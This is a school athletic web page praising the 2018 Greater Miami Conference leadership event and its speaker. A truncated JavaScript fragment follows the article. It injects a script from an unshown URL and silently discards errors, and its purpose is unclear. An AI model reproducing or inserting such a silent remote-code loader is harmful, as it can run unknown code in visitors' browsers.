Athletic Dept.
GMC Leadership Conference Video Speaks Volumes!
Article found at gmcsports.com
With all ten conference schools exchanging idea and positive interactions, the 2018 Greater Miami Leadership Conference was deemed a tremendous success. GMC leaders, students, coaches and administrators alike, understand that this conference is just the beginning and to be ultimately successful, it must serve as a springboard for continued commitment to sportsmanship, leadership and understanding.
Below is a video link from that conference hosted by conference facilitator Nick Jackson of “Nick Jackson Speaks”. As you will see, Nick Jackson brings a high degree of enthusiasm and connectivity to young people. The GMC is greatly appreciative of his expertise in organizing and executing this leadership event.
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();